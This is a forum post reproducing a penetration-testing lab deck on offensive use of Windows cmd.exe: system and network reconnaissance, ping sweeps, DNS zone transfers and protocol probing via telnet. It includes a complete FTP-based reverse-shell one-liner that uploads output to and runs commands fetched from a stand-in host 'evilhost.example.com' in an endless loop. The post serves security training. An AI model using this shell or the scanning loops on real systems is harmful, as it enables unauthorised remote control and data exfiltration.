begood Posted May 3, 2010 Report Posted May 3, 2010 Chris Clymer, CISSP ChrisClymer.com/articles/hacking_windows Who am I?I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCAI'm not even very good at MinesweeperI'm a UNIX geekI love the command lineHow much you ask?This entire presentation was created by writing out HTML markup by hand in the Vim text editor Why are you getting Windows tips from a UNIX guy?It turns out that for some reason, not every system runs UNIXIn fact, the ones we're most concerned about in Information Security are often running Windows (strange!)Bearded UNIX guys need to get cozy in the WIN32 worldWindows veterans benefit from learning to better leverage their OS's CLIThis presentation could also be called "How I learned to stop installing CYGWIN and love command.exe" Why hack without your tools?You can't always guarantee that you'll have your toolbox availableRelying on your tools can limit youYou want to impress women with your leet CLI skillsThe vast majority of the commands I will show you today should work on a typical modern Windows installation Our friend command.exeThis lab will focus on command.exePowershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platformsYou can launch it by going to Start -> Run -> cmd Our Building BlocksFind \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitivePing -n 5 host - sends 5 ICMP ping packets to hostTelnet host port - spawns an interactive telnet session to host. If is specified, this is used instead of the default Telnet port of 21 Command Control and Redirectioncommand1 & command2 - Run command1 and then command2command1 && command2 - Run command1 only if command2 runs successfullycommand1 || command2 - Execute command1 only when command2 does NOT run successfullycommand > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist.command >> "output.txt" - Concatenate output from command onto the end of file "output.txt"command1 | command2 - Pipe the output of command1 into command2You can direct the errors from a command using 2> errors.txt System Reconnaissance set - show environment variablesnet user - show local usersnet localgroups - show local groupssc query - list running servicessc query state= all - list all serviceswmic process list full - show details on all running processestasklist /svc - show all running processess and associated services Network Reconnaissance netstat -nao - show all current network activity, including PID'snetsh firewall show config - display windows firewall configurationipconfig /displaydns - systems this host has recently resolved through DNSarp -a - systems on the same subnet this host has recently communicated withnslookup - all purpose DNS query tool Let's Try OneClear your DNS cache: ipconfig /flushdnsipconfig /displaydns should only show your localhost: Let's Try OneNow lets add an entry: ping google.comAnother ipconfig /displaydns should show the new entry for google.com More on Nslookupnslookup some host - will lookup that host in DNS based on your localhost's DNS configurationnslookup - starts nslookup in interactive modeset type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR.ls -d example.com - if the server allows it, does a zone transfer of example.comls -t example.com - will give a list of member servers from the domain Fun with Telnet!Telnet is just an outdated, insecure remote administration tool right?What happens when you telnet to a port other than 21?Turns out many protocols are simple enough to interact with over telnetTelnet can stand in for Netcat for 1-way communication with remote hosts Lets test out some HTTPYou won'y be able to see what you're typing once you've started telnetFirst type GET /index.html http/1.1 and hit return Lets test out some HTTPYou should see something like the response below Lets test out some BAD HTTPThis time we'll type GET blahThis time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages What about SMTP?Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25Now that we're talking to the server we'll start the session by typing EHLO and then hitting entertype quit when ready to end the sessionIf you know your SMTP syntax, you can send email this way Telnet isn't the only choiceMany default Windows CLI apps can interact with a networkMany of these offer shell-like functionality and flexibilityThese apps can fill your Netcat niche when uploading nc.exe isn't an option Reverse shell using FTP echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del commands.txt) & ping -n 4 127.0.0.1) Explanation of FTP Reverse ShellThis command will be run on a compromised hostThe command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"Next it will upload the content of "output.txt" to evilhostFinally it will download "commands.txt" from evilhost, and run whatever is insideAll of this is done in an infinite loopAs long as the commands in "commands .txt" direct their output to "output.txt" evilhost will get the results Lets Talk About LoopsFOR /L - these loops are counters:FOR /L %i in (1,1,10) echo "Hello World" - prints "Hello World" 10 timesFOR /F - these loops are iteratorsFOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line Neat Shell Control TricksFOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand-in Network Scanning with PingFOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"This command will ping every host from 10.10.10.1 - 10.10.10.255By using find to parse through the results for "Reply" we only see the hosts which are respondingBy using @ping we prevent the ping commands themselves from showing in the terminal Reverse DNS LookupsFOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"Once again we're iterating through all hosts in the 10.10.10.0/24 networkThis time we will first echo each hosts IP to the terminalNext we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output!Searching through the results for "Name" gets us the part we care about Other Useful Commandstype - show the contents of a fileopenfiles /local on - enable openfiles logging(requires reboot)openfiles /query /v - show details on all open filesreg query [KeyName] - display value of registry key [KeyName]net use - mount fileshare Resources"Pen-Test Ninjitsu: Part 1" - Core Security Technologies"Built-in Windows Commands to Determine if a System has been Hacked" - Built-in Windows commands to determine if a system has been hacked"Nslookup and DNS Zone Transfers" - nslookup and DNS Zone TransfersSANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis SANS: Computer Security Training, Network Security Research, InfoSec ResourcesWindows Command Line Second Edition - William Stanek (Microsoft Press)"Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008 SANS 560If you found this lab useful, I strongly reccomend taking Ed Skoudis's SANS 560 courseEd is the best resource I have found for this sort of usage of the Windows CLIMuch of this lab was based on my experience taking the 560 courseEd's 1-day Windows Scripting course covers this material as wellPlus he's got much better war stories than I do!Hacking From the Windows Command Line 1 Quote
Flubber Posted May 4, 2010 Report Posted May 4, 2010 bookmarked, exceptional, de mult voiam asa ceva si este foarte foarte folositor!You can't always guarantee that you'll have your toolbox availableRelying on your tools can limit you11/10 Quote